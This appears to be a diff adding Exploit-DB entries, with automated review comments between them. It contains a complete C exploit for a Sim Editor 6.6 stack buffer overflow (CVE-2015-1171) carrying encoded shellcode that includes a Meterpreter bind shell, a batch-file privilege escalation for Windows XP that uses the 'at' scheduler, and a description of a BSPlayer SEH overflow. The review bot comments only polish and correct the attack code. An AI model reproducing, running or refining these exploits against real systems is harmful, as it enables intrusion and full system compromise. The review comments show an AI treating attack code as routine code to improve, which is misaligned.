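Review bot: `getch()` is called without `#include <conio.h>`, so it is an implicit declaration that MSVC warns on and C99-strict compilers reject; either add the include or use `getchar()` from the already-included `<stdio.h>`. `VirtualAlloc` can return NULL and `inbuffer` is passed straight to `memset`, so a guard such as `if (!inbuffer) return -1;` belongs before it. `BYTE sizebytes[4] = "\xff\xff\xff\x00";` relies on C's rule that a string literal of exactly the array length drops the terminator, which a C++ compiler rejects — a brace initialiser `{0xff, 0xff, 0xff, 0x00}` is unambiguous in both.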

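--- a/platforms/windows/local/35821.txt
+++ b/platforms/windows/local/35821.txt
@@ -0,0 +1,135 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#define SIZE 65536
+/*
+* Title: Sim Editor v6.6 Stack Based Buffer Overflow
+* Version: 6.6
+* Tested on: Windows XP sp2 en, Windows 8 64-bit
+* Date: 16-01-2015
+* Author: Osanda Malith Jayathissa
+* E-Mail: osanda[cat]unseen.is
+* Website: OsandaMalith.wordpress.com
+* CVE: CVE-2015-1171
+*/
+const char shell1[] = "ba516a43ddd9e9d97424f45e33c9b1"
+"3231561503561583eefce2a496ab54"
+"46672c07cf821d15abc70ca9b88abc"
+"42ec3e36263830ff8d1e7f00209ed3"
+"c222622e17855be16ac49c1c849475"
+"6a3709f22e8428d424b45251fa41e9"
+"582bf96612d3712082e25632feadd3"
+"81752c32d8761e7ab749ae77c98e09"
+"68bce46915c73f13c142ddb382f505"
+"454663ce4923e7884db224a36a3fcb"
+"63fb7be8a7a7d891fe0d8eaee0ea6f"
+"0b6b187b2d36777abf4d3e7cbf4d11"
+"158ec6fe620f0dbb9d450fea3500da"
+"ae5bb331ec6530b38d9128b688deee"
+"2be14f9b4b566f8e262bff50d1a58b"
+"92";
+/* msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R | msfencode -a x86 -t c */
+const char shell2[] = "bb3ff8edc8dbc6d97424f45f2bc9b1"
+"4a83effc315f11035f11e2ca04054e"
+"34f5d62fbd10e77dd9515ab2aa3457"
+"39feacec4fd6c345e500ed56cb8ca1"
+"954d70b8c9ad49731caf8e6eeffd47"
+"e44212ecb85e99be2ce77e744cc6d0"
+"0317c8d3c02341cc050f1b67fdfb9a"
+"a1cc04ad8d823a0100db7ba6fbae77"
+"d486a843a65c3d560016e5b2b0fb73"
+"30beb0f01ea347d514dfccd8fa6996"
+"fede324c9f479f23a098479b04d26a"
+"c831b9e23d7342f3290431c1f6bedd"
+"697e18198d55dcb570561c9fb6024c"
+"b71f2b07479ffe87170f5167c8ef01"
+"0f02e07e2f2d2a179e098670e2ad38"
+"dd6b4b50cd3dc3cd2f1adc6a4f4970"
+"22c7c69ef4e8d7b45644705f2d8645"
+"7e3283ee17a5597e55575dab0f97cb"
+"5786c06355ff272ca62a3ce532952b"
+"0ad215ac5cb815c4389845f14635fa"
+"aad2b5ab1f74dd5179b242a9ac42bf"
+"7c89c0c90af908";
+const char *shells[] = { shell1, shell2 };
+const char *shell_names[] = { "MS Paint", "Bind Shell" };
+const char *shell_info[] = { "", "[*] Connect on port 4444\n" };
+const size_t SHELLS_COUNT = 2;
+int menu() {
+size_t shell_type = SHELLS_COUNT;
+puts("\b[?] Choose an Option: ");
+size_t i;
+for (i = 0; i < SHELLS_COUNT; i++) printf("%d. %s\n", i, shell_names[i]);
+scanf("%i", &shell_type);
+return shell_type;
+}
+void banner() {
+static const char banner[] =
+" _____ _ _____ _ _ _ \n"
+"| __|_|_____ | __|_| |_| |_ ___ ___ \n"
+"|__ | | | | __| . | | _| . | _|\n"
+"|_____|_|_|_|_| |_____|___|_|_| |___|_|\n"
+"\n[~] Sim Editor v6.6 Stack Based Buffer Overflow\n"
+"[~] Author: Osanda Malith Jayathissa\n"
+"[~] E-Mail: osanda[cat]unseen.is\n"
+"[~] Website: OsandaMalith.wordpress.com\n\n";
+fwrite(banner, sizeof(char), sizeof(banner) , stdout);
+}
+void patternfill(char *dst, char *pattern, size_t count, size_t dst_size) {
+size_t pattern_len = strlen(pattern);
+count *= pattern_len;
+if (count > dst_size) count = dst_size;
+if (pattern_len > dst_size) pattern_len = dst_size;
+size_t i, pI;
+for (i = 0, pI = 0; i < count ; i++, pI++) {
+if (pI == pattern_len) pI = 0;
+dst[i] = pattern[pI];
+}
+}
+int main() {
+banner();
+int shell_type = menu();
+if (shell_type >= SHELLS_COUNT) {
+printf("[-] Enter a valid input\n");
+exit (1);
+}
+char *buff = (char*) calloc (SIZE, sizeof(char));
+char *nops = (char*) calloc (SIZE, sizeof(char));
+if (!buff || !nops) exit (1);
+patternfill(buff, "41", 405, SIZE);
+patternfill(nops, "90", 16, SIZE);
+char ret[] = "B3804200";
+const char* filename = "exploit.sms";
+FILE *outfile = fopen(filename, "w");
+if (!outfile) {
+printf("%s\n","Could not open file");
+exit (1);
+}
+fputs(buff, outfile);
+fputs(ret, outfile);
+fputs(nops, outfile);
+fputs(shells[shell_type], outfile);
+printf("%s", shell_info[shell_type]);
+fclose(outfile);
+free(buff);
+printf("[+] Successfully to written to: \"%s\"\n", filename);
+return 0;
+}
+/*EOF*/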
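Review bot: In `menu()`, `scanf("%i", &shell_type)` stores an `int` into a `size_t`, and `printf("%d. %s\n", i, ...)` prints a `size_t` with `%d`; both are format/type mismatches (undefined behaviour on LP64 targets) and `%zu` is the matching conversion for each. The `scanf` return value is unchecked, so non-numeric input leaves `shell_type` at `SHELLS_COUNT` and is rejected only because of that initial value; the rejection should be explicit, `if (scanf("%zu", &shell_type) != 1) return SHELLS_COUNT;`. In `main`, `nops` is never freed although `buff` is, `fwrite(banner, sizeof(char), sizeof(banner), stdout)` in `banner()` also writes the trailing NUL of the array, and the final message has a typo (`Successfully to written to`).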


@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/48232/info
Microsoft Windows is prone to a local privilege-escalation vulnerability.
A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.
@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
echo [*] Backup time
time < time.txt
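Review bot: `start time /T > time.txt` appears to apply the redirection to `start` itself rather than to the command it launches, which would leave `time.txt` empty and make the final `time < time.txt` restore step a no-op; the plain `time /T > time.txt` is what the restore needs. `time /T` also prints only hours and minutes, so even a successful restore drops the seconds that `time 13:36:59` set. The four identical `at 13:37 ... / cls` groups could be a single `for /L` loop, which would also make the retry count obvious to a reader.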


@ -0,0 +1,31 @@
# Exploit Title: Bsplayer HTTP Response BOF
# Date: Jan 17 ,2015
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Vendor Homepage: www.bsplayer.com
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# Version: current (2.68).
# Tested on: Windows 7 sp1 x86 version.
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
Exploit: http://www.exploit-db.com/sploits/35841.tar.gz
Bsplayer suffers from a buffer overflow vulnerability when processing the
HTTP response when opening a URL. In order to exploit this bug I needed to
load a dll with no null addresses and no safeseh ,ASLR or DEP. I noticed
that one of the dlls that matches this criteria is (MSVCR71.dll) and it's
loaded when I loaded an flv file over the network and that's why I'm
sending a legitimate flv file first so later we can use the loaded dll.
Also the space after the seh record is pretty small so what I did is that I
added a small stage shell cdoe to add offset to esp so it points at the
beginning of my buffer and then a jmp esp instruction to execute the actual
shellcode.
--
*Regards,*
Fady Osman
about.me/Fady_Osman
<http://about.me/Fady_Osman>